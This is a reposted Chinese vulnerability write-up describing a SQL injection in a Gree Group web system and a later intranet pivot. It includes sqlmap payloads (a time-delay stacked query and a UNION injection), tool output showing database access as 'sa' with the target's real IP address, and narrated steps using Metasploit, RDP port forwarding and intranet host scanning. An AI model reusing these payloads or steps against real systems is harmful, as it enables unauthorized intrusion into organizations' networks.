首页 网络安全 安全学院 查看内容

格力集团某系统漏洞导致内网漫游

2015-12-25 10:15 2605 0

摘要: 一个注射引发的内网沦陷小菜没什么技术,只会用用工具Parameter: class_id (GET)Type: stacked queriesTitle: Microsoft SQL Server/Sybasestacked queries (comment)Payload: class_id=1;WAITFOR DELAY '0:0:5'--Ty ...
关键词: CHAR Microsoft Server UNION class 120 113 NULL INFO 机器

一个注射引发的内网沦陷

小菜没什么技术,只会用用工具

Parameter: class_id (GET)

Type: stacked queries

Title: Microsoft SQL Server/Sybasestacked queries (comment)

Payload: class_id=1;WAITFOR DELAY '0:0:5'--

Type: UNION query

Title: Generic UNION query (NULL) - 3 columns

Payload: class_id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(120)+CHAR

(118)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(65)+CHAR(79)+CHAR(110)+CHAR(68)+CHAR(10

0)+CHAR(72)+CHAR(117)+CHAR(86)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(120)+CHAR(113)

,NULL--

---

[13:20:30] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: JSP

back-end DBMS: Microsoft SQL Server 2005

[13:20:30] [INFO] fetching current user

current user: 'sa'

[13:20:30] [INFO] fetched data logged to text files under 'C:\Administrator\.sqlmap

\output\61.190.20.51'

接下来就是sqlmap + metasploit 的时间了

可以看到成功上传payload,并建立了session

开启端口转发,将目标机器的3389转到本地3489

kali 是虚拟机 现在退到物理机连接kali(172.16.0.20) 的3489

sql server数据库

写个bat检测内网存活主机

在目标机上连接内网192.168.0.141,还是个08的系统

翻一翻,会不会有惊喜呢...

看到有好多网站开发代码,还有svn,难道是做程序开发的???

内网还有机器就不一一去试了,点到为止

嗯,还有什么呢... 对了,管理员密码是直接放到网站就跑出来了,建议修改密码吧

最后的最后,怎样才能脱离路人啊...

声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花
1

鸡蛋

刚表态过的朋友 (1 人)

  • 鸡蛋

    匿名

最新评论

返回顶部